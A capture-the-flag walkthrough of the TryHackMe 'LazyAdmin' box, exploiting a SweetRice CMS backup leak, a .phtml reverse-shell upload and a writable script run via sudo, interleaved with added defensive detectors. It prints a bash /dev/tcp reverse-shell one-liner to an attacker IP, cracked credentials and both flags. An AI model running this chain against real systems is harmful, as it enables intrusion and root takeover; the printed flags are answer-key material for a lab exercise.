Challenges: LazyAdmin (TryHackMe)

Jebitok
4 min read

In this walkthrough, we exploit a vulnerable machine titled Lazy Admin on TryHackMe. The target is running a SweetRice CMS instance with known vulnerabilities. Our objectives are to gain user-level access and ultimately escalate privileges to retrieve both the user and root flags. The machine demonstrates real-world web exploitation techniques such as information disclosure through backup files, weak credential practices, and misconfigured sudo permissions. Through directory enumeration, credential discovery, reverse shell deployment, and privilege escalation, we gradually uncover the machine's weaknesses and learn practical pentesting skills.

Lazy Admin

Have some fun! There might be multiple ways to get user access.

Note: It might take 2-3 minutes for the machine to boot

What is the user flag? THM{63e5bce9271952aad1113b6f1ac28a07}

Browsing to the site shows only the web server's default placeholder page (it references /var/www/html/index.html), so we move on to directory enumeration.

gobuster dir -u http://<IP_Address> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

curl http://<IP_Address>/content/as/index.php/

SweetRice is a CMS, so we check the CVEs and public exploits linked to it on Exploit Database.

We'll use this one: SweetRice 1.5.1 - Backup Disclosure - PHP Webapp exploit (https://www.exploit-db.com/exploits/40718).

When we looked at the curl output for http://<IP_Address>/content/as/index.php, there is an anchor tag whose href points at ./?type=password: <a href="./?type=password"></a>

curl http://<IP_Address>/content/as/?type=password

We'll try these web-exposed paths to find the leak:

```bash
# These may expose DB backups, configs, or admin credentials
curl http://10.10.111.37/content/backup/
curl http://10.10.111.37/content/data/
curl http://10.10.111.37/content/inc/
curl http://10.10.111.37/content/attachment/
curl http://10.10.111.37/content/as/data/

# Look for:
# `.sql` files
# `.xml` or `.json` configs
# `users.xml`, `config.xml`, etc.
```

Gobuster had already revealed /inc, so we list it and follow the backup directory it contains:

curl http://<IP_Address>/content/inc/

curl http://<IP_Address>/content/inc/mysql_backup/

curl http://<IP_Address>/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql -o backup.sql

cat backup.sql
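From the defender's side, the whole chain above (a listing of /content/inc/, then of mysql_backup/, then a successful download of the .sql dump) is visible in the web server's access log. The following is an added example, not part of the original walkthrough or of SweetRice: a small Python detector that runs over a constructed Apache combined-format log and flags directory listings under the sensitive /content/ paths, backup-file downloads that returned 200, and clients racking up enough 404s to look like a directory brute-force. The log lines, IPs and threshold are constructed for the example.

```python
import re
from collections import Counter

# Constructed sample log lines (Apache "combined" format); not taken from the page.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Nov/2019:02:30:59 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [29/Nov/2019:02:31:10 +0000] "GET /content/inc/ HTTP/1.1" 200 1843 "-" "curl/7.68.0"
10.0.0.9 - - [29/Nov/2019:02:31:12 +0000] "GET /content/inc/mysql_backup/ HTTP/1.1" 200 940 "-" "curl/7.68.0"
10.0.0.9 - - [29/Nov/2019:02:31:15 +0000] "GET /content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql HTTP/1.1" 200 60443 "-" "curl/7.68.0"
10.0.0.9 - - [29/Nov/2019:02:31:20 +0000] "GET /content/as/?type=password HTTP/1.1" 200 2210 "-" "curl/7.68.0"
10.0.0.7 - - [29/Nov/2019:02:32:00 +0000] "GET /content/backup/ HTTP/1.1" 404 210 "-" "gobuster/3.1"
10.0.0.7 - - [29/Nov/2019:02:32:01 +0000] "GET /admin/ HTTP/1.1" 404 210 "-" "gobuster/3.1"
10.0.0.7 - - [29/Nov/2019:02:32:02 +0000] "GET /content/data/ HTTP/1.1" 404 210 "-" "gobuster/3.1"
"""

# client, timestamp, request line, status, response size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# The paths probed in the walkthrough; none of them should be browsable on a live site.
SENSITIVE_PREFIXES = ("/content/inc/", "/content/backup/", "/content/data/", "/content/attachment/")
BACKUP_EXTENSIONS = (".sql", ".xml", ".json", ".bak", ".zip", ".gz")
SCAN_404_THRESHOLD = 3  # 404s from one client before we call it a directory brute-force (constructed value)


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # drop the query string so prefix/extension checks see only the path
    rec["bare_path"] = rec["path"].split("?", 1)[0].lower()
    return rec


def classify_request(rec):
    """Return (severity, reason) for a successful request into a sensitive path, else None."""
    path = rec["bare_path"]
    if rec["status"] != 200 or not path.startswith(SENSITIVE_PREFIXES):
        return None
    if path.endswith(BACKUP_EXTENSIONS):
        return ("critical", "backup or config file served from a web-exposed directory")
    if path.endswith("/"):
        return ("high", "directory listing of a sensitive path succeeded")
    return ("medium", "request into a sensitive path succeeded")


def scan_log(text):
    """Run both rules over the whole log and return a list of finding dicts."""
    findings = []
    not_found = Counter()
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["status"] == 404:
            not_found[rec["ip"]] += 1
        hit = classify_request(rec)
        if hit:
            findings.append({"ip": rec["ip"], "path": rec["path"],
                             "severity": hit[0], "reason": hit[1]})
    for ip, n in not_found.items():
        if n >= SCAN_404_THRESHOLD:
            findings.append({"ip": ip, "path": None, "severity": "low",
                             "reason": f"{n} responses of 404: likely directory brute-force"})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"].upper(), f["ip"], f["path"], "-", f["reason"])
```

The critical finding is the one to alert on: a 200 for a .sql file under /content/inc/ means the backup was actually served, not merely probed. The fix on the server side is the same regardless of the CMS: keep backups out of the document root and disable directory listings.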

You can access the backup.sql file on gists here: backup.sql file on gists. The line below is our area of interest: it reveals the site's admin credentials (the username and the password hash).

14 => 'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin&#039;s Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\"Description\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\";s:5:\\"close\\";i:1;s:9:\\"close_tip\\";s:454:\\"<p>Welcome to SweetRice - Thank your for install SweetRice as your website management system.</p><h1>This site is building now , please come late.</h1><p>If you are the webmaster,please go to Dashboard -> General -> Website setting </p><p>and uncheck the checkbox \\"Site close\\" to open your website.</p><p>More help at <a href=\\"http://www.basic-cms.org/docs/5-things-need-to-be-done-when-SweetRice-installed/\\">Tip for Basic CMS SweetRice installed</a></p>\\";s:5:\\"cache\\";i:0;s:13:\\"cache_expired\\";i:0;s:10:\\"user_track\\";i:0;s:11:\\"url_rewrite\\";i:0;s:4:\\"logo\\";s:0:\\"\\";s:5:\\"theme\\";s:0:\\"\\";s:4:\\"lang\\";s:9:\\"en-us.php\\";s:11:\\"admin_email\\";N;}\',\'1575023409\');',

Looking the hash up on CrackStation (a precomputed hash lookup table) reveals the password.

Visit http://<IP_Address>/content/as/ and log in with the credentials manager | Password123

Copy /usr/share/webshells/php/php-reverse-shell.php to a new file, e.g. shell.php, then edit it with nano shell.php and change <IP_Address> to the AttackBox IP and the port to 4444. I tried uploading the .php and .php5 versions, but neither called back to the listening port.

$ cp /usr/share/webshells/php/php-reverse-shell.php shell.php5

$ nc -lvnp 4444 # in a separate terminal tab

I then found that the media center allows adding attachments/files and accepts .phtml, so I renamed the file to shell.phtml and uploaded it there. The listener now gave us a shell as the user itguy, and hence the user flag.

Click on the shell.phtml file you uploaded, then switch back to the terminal and check the listener on port 5555.
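The upload step succeeded because the media center's filter rejected .php and .php5 but not .phtml, which the server still hands to the PHP interpreter. A deny-list of "bad" extensions is the wrong shape for this check. As an added example (not SweetRice's code, and not from the walkthrough), here is the validator shape a media library should use: an allow-list of the few types it actually needs, applied to every extension in the name so double extensions cannot slip through, a content check against the file's leading bytes, and a server-chosen storage name. The set of PHP-executable extensions is an assumption about a default PHP handler mapping.

```python
import os
import secrets

# Extensions a default PHP handler mapping executes (assumption about the web server config).
# The walkthrough's .php, .php5 and .phtml all appear here; a filter that only knows ".php" misses the rest.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "php8", "phtml", "phar", "pht", "phps"}

# What a media library legitimately needs (allow-list, constructed for the example)
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf"}

# Leading bytes the declared type must match
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"%PDF-": "pdf",
}


def validate_upload(filename: str, data: bytes):
    """Return (accepted, reason). Checks every extension in the name, the allow-list, then the content."""
    base = os.path.basename(filename)
    parts = base.lower().split(".")
    if len(parts) < 2 or parts[0] == "":
        return False, "missing extension or dotfile-style name"
    exts = parts[1:]
    # shell.phtml, shell.php5 and shell.php.jpg all fail here: an executable extension anywhere in the chain
    if any(e in EXECUTABLE_EXTENSIONS for e in exts):
        return False, "server-executable extension in filename"
    declared = "jpg" if exts[-1] == "jpeg" else exts[-1]
    if declared not in ALLOWED_EXTENSIONS:
        return False, f"extension .{exts[-1]} not in allow-list"
    actual = next((kind for sig, kind in MAGIC.items() if data.startswith(sig)), None)
    if actual != declared:
        return False, "content does not match declared type"
    return True, "ok"


def storage_name(filename: str) -> str:
    """Server-chosen on-disk name for an upload that already passed validate_upload:
    random token plus the validated extension, so the client's name never reaches the filesystem."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    png_bytes = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16   # constructed minimal PNG header
    for name, data in [("shell.phtml", b"<?php echo 1; ?>"),
                       ("shell.php.jpg", b"<?php echo 1; ?>"),
                       ("logo.png", b"<?php echo 1; ?>"),
                       ("logo.png", png_bytes)]:
        print(name, validate_upload(name, data))
```

Beyond the validator, the upload directory itself should be served with script execution disabled, so that even a file that slips through is returned as bytes rather than run.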

find / -type f -name user.txt 2> /dev/null

cat /home/itguy/user.txt

What is the root flag? THM{6637f41d0177b6f37cb20d775124699f}

echo '#!/bin/bash' > /etc/copy.sh

echo 'bash -c '\''exec bash -i &>/dev/tcp/10.10.23.119/5555 <&1'\''' >> /etc/copy.sh

The sudo rule lets itguy run /home/itguy/backup.pl as root, and that script executes /etc/copy.sh, which is writable, so the two echo lines above replace copy.sh with a reverse-shell one-liner. In the other tab, have nc -lvnp 5555 listening before you run the next command:

sudo /usr/bin/perl /home/itguy/backup.pl

Checking the other tab, the privileges have been escalated to root:

whoami

find / -type f -name root.txt 2> /dev/null

cat /root/root.txt
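The root step works because a script that sudo allows to run as root pulls in a second file that an unprivileged user can rewrite. That is a checkable condition on any host. As an added example (not part of the walkthrough and not the box's own files), the Python below audits a sudo-permitted script: it flags the script itself if a non-owner can write it, then scans the script body for absolute paths and flags any referenced file that is group- or world-writable, or that sits in a world-writable directory without the sticky bit. The demo builds a constructed stand-in in a temporary directory (a backup.pl that shells out to a world-writable copy.sh); the sudoers rule text and the script contents are assumptions.

```python
import os
import re
import stat
import tempfile

# Absolute paths mentioned in a script body, quoted or bare
ABS_PATH_RE = re.compile(r"(?<![\w.-])/(?:[\w.-]+/)*[\w.-]+")


def writable_by_non_owner(path: str) -> bool:
    """True if group or world can write the file, or if its parent directory is world-writable
    without the sticky bit (which lets anyone replace the file outright)."""
    st = os.stat(path)
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return True
    parent = os.stat(os.path.dirname(path) or ".")
    return bool(parent.st_mode & stat.S_IWOTH) and not (parent.st_mode & stat.S_ISVTX)


def audit_sudo_script(script_path: str):
    """Findings (path, reason) for a script that a sudo rule lets a user run as root."""
    findings = []
    if writable_by_non_owner(script_path):
        findings.append((script_path, "sudo target is writable by a non-owner"))
    with open(script_path, encoding="utf-8", errors="replace") as fh:
        body = fh.read()
    for ref in sorted(set(ABS_PATH_RE.findall(body))):
        if ref == script_path or not os.path.isfile(ref):
            continue
        if writable_by_non_owner(ref):
            findings.append((ref, "file referenced by the sudo target is writable by a non-owner"))
    return findings


def build_demo():
    """Constructed stand-in for the misconfiguration (hypothetical files, not the box's own):
    a backup.pl that shells out to a helper script, with the helper left world-writable.
    Returns the audit findings."""
    tmp = tempfile.mkdtemp()
    helper = os.path.join(tmp, "copy.sh")
    script = os.path.join(tmp, "backup.pl")
    with open(helper, "w") as fh:
        fh.write("#!/bin/sh\ncp -r /var/www/html /var/backups/html\n")
    os.chmod(helper, 0o777)          # the misconfiguration: anyone can rewrite what root will run
    with open(script, "w") as fh:
        fh.write(f'#!/usr/bin/perl\nsystem("sh", "{helper}");\n')
    os.chmod(script, 0o755)          # the sudo target itself is fine
    return audit_sudo_script(script)


if __name__ == "__main__":
    for path, reason in build_demo():
        print(f"{path}: {reason}")
```

The remediation follows directly from the finding: root-owned, mode 0755 or tighter, for the script and for everything it executes, and no sudo rule on a script whose dependencies are not all under root's control.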

The Lazy Admin challenge showcases a classic example of poor security hygiene — from exposed backup files to weak credentials and dangerous sudo configurations. By leveraging a known CVE in SweetRice, performing methodical enumeration, and exploiting a poorly secured Perl script, we successfully gained initial access and escalated to root. This machine reinforces the importance of securing sensitive paths, using strong passwords, and limiting sudo access. Overall, it provides a great opportunity to practice web application exploitation and privilege escalation in a structured CTF environment.
